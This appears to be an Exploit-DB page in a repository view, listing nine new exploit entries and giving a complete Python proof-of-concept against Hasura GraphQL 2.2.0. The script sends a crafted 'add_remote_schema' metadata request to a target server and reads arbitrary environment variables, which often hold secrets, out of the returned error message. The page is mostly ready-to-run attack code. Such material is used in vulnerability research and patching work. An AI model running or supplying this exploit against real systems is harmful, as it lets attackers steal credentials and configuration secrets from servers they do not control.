e8863e001f
9 changes to exploits/shellcodes Private Internet Access 3.3 - 'pia-service' Unquoted Service Path Cloudflare WARP 1.4 - Unquoted Service Path Malwarebytes 4.5 - Unquoted Service Path Foxit PDF Reader 11.0 - Unquoted Service Path Spring Cloud Gateway 3.1.0 - Remote Code Execution (RCE) part-db 0.5.11 - Remote Code Execution (RCE) Attendance and Payroll System v1.0 - Remote Code Execution (RCE) Attendance and Payroll System v1.0 - SQLi Authentication Bypass Hasura GraphQL 2.2.0 - Information Disclosure
47 lines
No EOL
1.2 KiB
Python
Executable file
47 lines
No EOL
1.2 KiB
Python
Executable file
# Exploit Title: Hasura GraphQL 2.2.0 - Information Disclosure
|
|
# Software: Hasura GraphQL Community
|
|
# Software Link: https://github.com/hasura/graphql-engine
|
|
# Version: 2.2.0
|
|
# Exploit Author: Dolev Farhi
|
|
# Date: 5/05/2022
|
|
# Tested on: Ubuntu
|
|
|
|
import requests
|
|
|
|
SERVER_ADDR = 'x.x.x.x'
|
|
|
|
url = 'http://{}/v1/metadata'.format(SERVER_ADDR)
|
|
|
|
print('Hasura GraphQL Community 2.2.0 - Arbitrary Root Environment Variables Read')
|
|
|
|
while True:
|
|
env_var = input('Type environment variable key to leak.\n> ')
|
|
if not env_var:
|
|
continue
|
|
|
|
payload = {
|
|
"type": "bulk",
|
|
"source": "",
|
|
"args": [
|
|
{
|
|
"type": "add_remote_schema",
|
|
"args": {
|
|
"name": "ttt",
|
|
"definition": {
|
|
"timeout_seconds": 60,
|
|
"forward_client_headers": False,
|
|
"headers": [],
|
|
"url_from_env": env_var
|
|
},
|
|
"comment": ""
|
|
}
|
|
}
|
|
],
|
|
"resource_version": 2
|
|
}
|
|
r = requests.post(url, json=payload)
|
|
try:
|
|
print(r.json()['error'].split('not a valid URI:')[1])
|
|
except IndexError:
|
|
print('Could not parse out VAR, dumping error as is')
|
|
print(r.json().get('error', 'N/A')) |